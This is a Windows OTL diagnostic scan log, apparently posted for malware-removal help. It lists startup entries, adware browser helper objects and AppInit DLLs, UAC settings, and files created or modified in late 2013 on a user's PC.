CHR - Extension: No name found = C:\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\Extensions\eoccbpoodnckjdnackiffhjfkogfhnhh\3.2.800\
CHR - Extension: FuanDEals = C:\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmjghjlpeglhomoeofllnjbmkfojelei\2.2\
 
O1 HOSTS File: ([2012/05/13 14:52:47 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2:64bit: - BHO: (DeAlEoxipRRESs) - {782901CE-CEDE-22C8-3EDF-BB5F7E77E683} - C:\ProgramData\DeAlEoxipRRESs\l7m.x64.dll ()
O2:64bit: - BHO: (FuanDEals) - {F2C4E697-A038-3939-62E6-60ABEF8A5266} - C:\ProgramData\FuanDEals\U.x64.dll ()
O2 - BHO: (DeAlEoxipRRESs) - {782901CE-CEDE-22C8-3EDF-BB5F7E77E683} - C:\ProgramData\DeAlEoxipRRESs\l7m.dll ()
O2 - BHO: (FuanDEals) - {F2C4E697-A038-3939-62E6-60ABEF8A5266} - C:\ProgramData\FuanDEals\U.dll ()
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No CLSID value found.
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [BCU] C:\Program Files (x86)\DeviceVM\Browser Configuration Utility\BCU.exe (DeviceVM, Inc.)
O4 - HKLM..\Run: [mobilegeni daemon] C:\Program Files (x86)\Mobogenie\DaemonProcess.exe File not found
O4 - HKLM..\Run: [NCUpdateHelper] C:\Program Files (x86)\NCWest\NCLauncher\NCUpdateHelper.exe (NCSOFT Corporation)
O4 - HKCU..\Run: [NextLive] C:\Users\Wesley\AppData\Roaming\newnext.me\nengine.dll (NewNextDotMe)
O4 - HKCU..\Run: [PlayNC Launcher]  File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O8:64bit: - Extra context menu item: Download with &Media Finder - C:\Program Files (x86)\Media Finder\hook.html File not found
O8 - Extra context menu item: Download with &Media Finder - C:\Program Files (x86)\Media Finder\hook.html File not found
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000011 - C:\Windows\SysNative\vsocklib.dll (VMware, Inc.)
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000012 - C:\Windows\SysNative\vsocklib.dll (VMware, Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000011 - C:\Windows\SysWOW64\vsocklib.dll (VMware, Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000012 - C:\Windows\SysWOW64\vsocklib.dll (VMware, Inc.)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.6.2)
O16 - DPF: {CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_34)
O16 - DPF: {CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_06)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_06)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{13CBDABD-BDF8-4E2E-8B88-A4D9F83A7A58}: DhcpNameServer = 192.168.252.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3CA9C62F-961E-44AC-995E-48E28CAF140A}: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BB27403B-FA1B-4168-9C7B-4D4092729072}: DhcpNameServer = 68.87.68.166 68.87.74.166
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{EAEDBEA4-03ED-4E5F-BF50-FFDB1C264342}: DhcpNameServer = 75.75.75.75 75.75.76.76
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - AppInit_DLLs: (C:\PROGRA~3\WebPlat\WEBPLA~1.DLL) - C:\ProgramData\WebPlat\WebPlat_x64.dll ()
O20 - AppInit_DLLs: (c:\progra~3\webplat\webplat.dll) - c:\ProgramData\WebPlat\WebPlat.dll ()
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/05/05 09:36:45 | 000,000,000 | ---D | M] - C:\Autodesk -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
 
Drivers32:64bit: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32:64bit: VIDC.FPS1 - frapsv64.dll (Beepa P/L)
Drivers32: msacm.l3acm - C:\Windows\SysWOW64\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: vidc.cvid - C:\Windows\SysWow64\iccvid.dll (Radius Inc.)
Drivers32: VIDC.FPS1 - C:\Windows\SysWow64\frapsvid.dll (Beepa P/L)
Drivers32: VIDC.VMnc - C:\Windows\SysWow64\vmnc.dll (VMware, Inc.)
 
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
 
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/01/03 07:49:25 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Wesley\Desktop\OTL(1).exe
[2014/01/02 23:21:38 | 004,745,728 | ---- | C] (AVAST Software) -- C:\Users\Wesley\Desktop\aswMBR.exe
[2014/01/02 07:58:28 | 000,388,608 | ---- | C] (Trend Micro Inc.) -- C:\Users\Wesley\Desktop\HiJackThis(1).exe
[2013/12/31 23:48:39 | 000,000,000 | ---D | C] -- C:\ProgramData\DeAlEoxipRRESs
[2013/12/31 23:48:37 | 000,000,000 | ---D | C] -- C:\ProgramData\pfkajdnmeplnnlemjfagojglpeelceaj
[2013/12/31 23:48:34 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\Packages
[2013/12/31 23:48:34 | 000,000,000 | ---D | C] -- C:\ProgramData\3bbeb3a6f04741f7
[2013/12/31 23:48:33 | 000,000,000 | ---D | C] -- C:\ProgramData\FuanDEals
[2013/12/29 13:43:57 | 000,000,000 | ---D | C] -- C:\Users\Wesley\.android
[2013/12/29 13:43:55 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Roaming\newnext.me
[2013/12/29 13:43:55 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\cache
[2013/12/29 13:43:53 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\genienext
[2013/12/29 13:43:51 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\Mobogenie
[2013/12/29 13:43:51 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\Mobogenie
[2013/12/29 13:42:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mobogenie
[2013/12/29 13:42:52 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Optimizer Pro
[2013/12/28 08:37:50 | 000,000,000 | ---D | C] -- C:\ProgramData\WebPlat
[2013/12/27 11:21:56 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\TGitCache
[2013/12/27 11:20:16 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\src
[2013/12/27 11:20:16 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\bin
[2013/12/27 11:13:12 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\FlashDevelop
[2013/12/27 11:11:00 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Git
[2013/12/27 11:10:43 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Git
[2013/12/27 11:08:22 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Desktop\SkyUI_stuff
[2013/12/27 11:05:23 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TortoiseGit
[2013/12/27 11:05:21 | 000,000,000 | ---D | C] -- C:\Program Files\TortoiseGit
[2013/12/27 11:01:15 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashDevelop
[2013/12/27 11:00:52 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\FlashDevelop
[2013/12/12 12:04:39 | 000,000,000 | ---D | C] -- C:\ProgramData\BioWare
[2013/12/12 12:00:12 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\BioWare
[2013/12/11 08:19:50 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2013/12/09 15:39:05 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\NCSOFT
[2013/12/09 15:38:41 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCWest
[2013/12/09 15:38:41 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\NCWest
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/01/03 07:49:28 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Wesley\Desktop\OTL(1).exe
[2014/01/03 07:47:22 | 000,000,559 | ---- | M] () -- C:\Users\Wesley\Desktop\MBR.zip
[2014/01/03 07:45:59 | 000,000,512 | ---- | M] () -- C:\Users\Wesley\Desktop\MBR.dat
[2014/01/03 07:17:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/01/02 23:21:44 | 004,745,728 | ---- | M] (AVAST Software) -- C:\Users\Wesley\Desktop\aswMBR.exe
[2014/01/02 23:08:40 | 000,987,410 | ---- | M] () -- C:\Users\Wesley\Desktop\SecurityCheck.exe
[2014/01/02 23:03:55 | 000,026,512 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/01/02 23:03:55 | 000,026,512 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/01/02 22:55:53 | 000,025,640 | ---- | M] (Windows ® Server 2003 DDK provider) -- C:\Windows\gdrv.sys
[2014/01/02 22:55:52 | 000,000,376 | -H-- | M] () -- C:\Windows\tasks\MagniPicUpdaterTask{1808030E-38EA-43D5-A427-B34BA55CD23C}.job
[2014/01/02 22:55:45 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/01/02 22:55:39 | 3206,471,680 | -HS- | M] () -- C:\hiberfil.sys
[2014/01/02 13:07:15 | 000,020,749 | ---- | M] () -- C:\Users\Wesley\Documents\Public_Executions_Tutorial.odt
[2014/01/02 07:58:31 | 000,388,608 | ---- | M] (Trend Micro Inc.) -- C:\Users\Wesley\Desktop\HiJackThis(1).exe
[2013/12/27 11:50:54 | 000,000,090 | ---- | M] () -- C:\Users\Wesley\mm.cfg
[2013/12/27 11:42:57 | 000,692,616 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2013/12/27 11:42:57 | 000,071,048 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2013/12/27 11:22:21 | 000,002,010 | ---- | M] () -- C:\Users\Wesley\Documents\SelectedItemMonitor.as2proj
[2013/12/27 06:34:31 | 000,005,756 | ---- | M] () -- C:\Users\Wesley\Documents\Database.kdb
[2013/12/26 08:48:29 | 000,294,402 | ---- | M] () -- C:\Users\Wesley\Desktop\ScreenShot472.jpg
[2013/12/26 08:48:19 | 000,285,855 | ---- | M] () -- C:\Users\Wesley\Desktop\ScreenShot471.jpg
[2013/12/25 11:09:45 | 000,014,582 | ---- | M] () -- C:\Users\Wesley\Desktop\animationtest.nif
[2013/12/25 11:09:45 | 000,000,118 | ---- | M] () -- C:\Users\Wesley\Desktop\animationtest.kf
[2013/12/25 08:14:22 | 000,008,878 | ---- | M] () -- C:\Users\Wesley\Desktop\watertestorb.nif
[2013/12/25 08:11:59 | 000,006,192 | ---- | M] () -- C:\Users\Wesley\AppData\Local\recently-used.xbel
[2013/12/17 18:42:54 | 000,007,624 | ---- | M] () -- C:\Users\Wesley\AppData\Local\Resmon.ResmonCfg
[2013/12/17 18:08:17 | 000,877,058 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2013/12/17 18:08:17 | 000,729,420 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2013/12/17 18:08:17 | 000,147,176 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2013/12/15 09:48:05 | 000,000,890 | ---- | M] () -- C:\Users\Public\Desktop\Nexus Mod Manager.lnk
[2013/12/13 12:49:17 | 000,000,023 | ---- | M] () -- C:\Windows\BlendSettings.ini
[2013/12/13 09:27:20 | 000,000,221 | ---- | M] () -- C:\Users\Wesley\Desktop\The Elder Scrolls IV Oblivion.url
[2013/12/12 17:34:53 | 000,000,641 | ---- | M] () -- C:\Users\Wesley\Documents\HT_todoList.rtf
[2013/12/12 10:51:15 | 000,000,221 | ---- | M] () -- C:\Users\Wesley\Desktop\Dragon Age Origins - Ultimate Edition.url
[2013/12/12 09:43:58 | 000,002,655 | ---- | M] () -- C:\Users\Wesley\Documents\Allowed_List.rtf
[2013/12/11 11:52:10 | 000,002,048 | ---- | M] () -- C:\Users\Wesley\Application Data\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk
[2013/12/09 15:39:05 | 000,002,248 | ---- | M] () -- C:\Users\Public\Desktop\Lineage II.lnk
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/01/03 07:47:22 | 000,000,559 | ---- | C] () -- C:\Users\Wesley\Desktop\MBR.zip
[2014/01/03 07:45:59 | 000,000,512 | ---- | C] () -- C:\Users\Wesley\Desktop\MBR.dat
[2014/01/02 23:08:36 | 000,987,410 | ---- | C] () -- C:\Users\Wesley\Desktop\SecurityCheck.exe
[2014/01/02 13:07:13 | 000,020,749 | ---- | C] () -- C:\Users\Wesley\Documents\Public_Executions_Tutorial.odt
[2013/12/27 11:20:16 | 000,002,010 | ---- | C] () -- C:\Users\Wesley\Documents\SelectedItemMonitor.as2proj
[2013/12/27 11:13:14 | 000,000,090 | ---- | C] () -- C:\Users\Wesley\mm.cfg
[2013/12/26 08:48:29 | 000,294,402 | ---- | C] () -- C:\Users\Wesley\Desktop\ScreenShot472.jpg
[2013/12/26 08:48:19 | 000,285,855 | ---- | C] () -- C:\Users\Wesley\Desktop\ScreenShot471.jpg
[2013/12/25 11:09:45 | 000,000,118 | ---- | C] () -- C:\Users\Wesley\Desktop\animationtest.kf
[2013/12/25 08:14:22 | 000,008,878 | ---- | C] () -- C:\Users\Wesley\Desktop\watertestorb.nif
[2013/12/25 08:11:59 | 000,006,192 | ---- | C] () -- C:\Users\Wesley\AppData\Local\recently-used.xbel
[2013/12/25 06:19:47 | 000,014,582 | ---- | C] () -- C:\Users\Wesley\Desktop\animationtest.nif
[2013/12/13 09:27:20 | 000,000,221 | ---- | C] () -- C:\Users\Wesley\Desktop\The Elder Scrolls IV Oblivion.url
[2013/12/12 10:51:15 | 000,000,221 | ---- | C] () -- C:\Users\Wesley\Desktop\Dragon Age Origins - Ultimate Edition.url
[2013/12/11 13:35:46 | 000,000,641 | ---- | C] () -- C:\Users\Wesley\Documents\HT_todoList.rtf
[2013/12/11 13:27:41 | 000,002,655 | ---- | C] () -- C:\Users\Wesley\Documents\Allowed_List.rtf
[2013/12/09 15:39:05 | 000,002,248 | ---- | C] () -- C:\Users\Public\Desktop\Lineage II.lnk
[2013/08/09 12:11:40 | 000,000,089 | ---- | C] () -- C:\Users\Wesley\.gtk-bookmarks
[2013/03/08 08:41:00 | 000,000,600 | ---- | C] () -- C:\Users\Wesley\AppData\Local\PUTTY.RND
[2012/11/07 10:42:16 | 000,444,283 | ---- | C] () -- C:\Program Files\Common Files\WinPcapNmap.exe
[2012/03/31 01:16:37 | 000,000,600 | ---- | C] () -- C:\Users\Wesley\AppData\Roaming\winscp.rnd
[2012/01/13 11:50:02 | 000,151,552 | ---- | C] () -- C:\Windows\SysWow64\nvRegDev.dll
[2011/10/29 09:30:13 | 000,030,720 | ---- | C] () -- C:\Users\Wesley\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011/07/08 06:43:10 | 000,009,707 | ---- | C] () -- C:\Users\Wesley\AppData\Roaming\C186.2A3
[2011/01/01 04:02:54 | 000,007,624 | ---- | C] () -- C:\Users\Wesley\AppData\Local\Resmon.ResmonCfg
 
========== ZeroAccess Check ==========
 
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2010/07/27 09:59:11 | 014,162,944 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2010/07/27 09:03:24 | 012,867,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009/07/13 20:15:20 | 000,605,696 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2011/05/30 12:26:14 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\acccore
[2012/10/10 16:31:49 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Aion RainMeter
[2013/03/31 13:46:55 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Arc
[2013/05/05 10:00:47 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Autodesk
[2013/12/04 11:22:03 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\avidemux
[2013/09/20 15:10:33 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Downloaded Installations
[2014/01/01 18:36:49 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\FileZilla
[2011/02/08 00:30:27 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\GetRightToGo
[2013/04/03 07:55:27 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Industriya
[2013/07/03 14:23:16 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\KeePass
[2011/12/10 18:19:09 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Media Finder
[2011/02/03 05:13:42 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\NCH Swift Sound
[2014/01/03 04:56:26 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\newnext.me
[2013/03/11 17:02:05 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Notepad++
[2011/01/01 09:26:32 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\OpenOffice.org
[2013/09/20 15:10:54 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\PingPlotter
[2012/07/23 15:53:45 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\SEGA
[2013/12/06 17:22:43 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\SoftGrid Client
[2011/12/15 16:47:36 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Sony
[2013/04/20 10:53:16 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Strongvault
[2013/01/28 13:56:20 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Sublime Text 2
[2013/07/14 12:41:23 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Sublime Text 3
[2012/01/11 07:42:31 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Subversion
[2010/12/22 13:24:15 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\TP
[2013/11/05 09:15:47 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\uTorrent
[2012/11/07 10:43:25 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\VDownloader
[2013/07/04 09:07:02 | 000,000,000 | ---D | M] -- C:\Users\Wesley\AppData\Roaming\Windows Live Writer
 
========== Purity Check ==========
 
 
 
========== Custom Scans ==========
 
< %USERPROFILE%\..|smtmp;true;true;true /FP >
 
< %temp%\smtmp\*.* /s > >
 
< MD5 for: EXPLORER.ADML  >
[2009/07/13 21:30:02 | 000,003,695 | ---- | M] () MD5=7A4C7F3CB156543113596988479CAFCE -- C:\Windows\winsxs\amd64_microsoft-windows-s..ouppolicy.resources_31bf3856ad364e35_6.1.7600.16385_en-us_7ef5713984067904\Explorer.adml
 
< MD5 for: EXPLORER.ADMX  >
[2009/06/10 15:53:55 | 000,003,836 | ---- | M] () MD5=AD131A834808E6AFF4A3918DE05BFCF6 -- C:\Windows\winsxs\amd64_microsoft-windows-shell-grouppolicy_31bf3856ad364e35_6.1.7600.16385_none_71af9b5b0a86e6b7\Explorer.admx
 
< MD5 for: EXPLORER.EXE  >
[2011/02/26 01:23:14 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=0862495E0C825893DB75EF44FAEA8E93 -- C:\Windows\SoftwareDistribution\Download\71d84967e1e9a8a414d570c6caa8bb08\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16768_none_adc24107935a7e25\explorer.exe
[2011/02/26 00:19:21 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=0FB9C74046656D1579A64660AD67B746 -- C:\Windows\SoftwareDistribution\Download\71d84967e1e9a8a414d570c6caa8bb08\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_ba87e574ddfe652d\explorer.exe
[2009/07/13 20:14:20 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=15BC38A7492BEFE831966ADB477CF76F -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_b7fe430bc7ce3761\explorer.exe
[2011/02/26 00:51:13 | 002,614,784 | ---- | M] (Microsoft Corporation) MD5=255CF508D7CFB10E0794D6AC93280BD8 -- C:\Windows\SoftwareDistribution\Download\71d84967e1e9a8a414d570c6caa8bb08\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20910_none_b8ce9756e0b786a4\explorer.exe
[2009/10/31 00:45:39 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=2626FC9755BE22F805D3CFA0CE3EE727 -- C:\Windows\SysWOW64\explorer.exe
[2009/10/31 00:45:39 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=2626FC9755BE22F805D3CFA0CE3EE727 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_b819b343c7ba6202\explorer.exe
[2011/02/26 00:33:07 | 002,614,784 | ---- | M] (Microsoft Corporation) MD5=2AF58D15EDC06EC6FDACCE1F19482BBF -- C:\Windows\SoftwareDistribution\Download\71d84967e1e9a8a414d570c6caa8bb08\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16768_none_b816eb59c7bb4020\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\SoftwareDistribution\Download\71d84967e1e9a8a414d570c6caa8bb08\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_afa79dc39081d0ba\explorer.exe
[2011/02/26 01:14:34 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=3B69712041F3D63605529BD66DC00C48 -- C:\Windows\SoftwareDistribution\Download\71d84967e1e9a8a414d570c6caa8bb08\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_b0333b22a99da332\explorer.exe
[2010/11/20 07:17:09 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\SoftwareDistribution\Download\488053cdbca3231eeb2c2af7236d09ed\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_ba2f56d3c4bcbafb\explorer.exe
[2009/08/03 01:19:07 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=700073016DAC1C3D2E7E2CE4223334B6 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20500_none_ae84b558ac4eb41c\explorer.exe
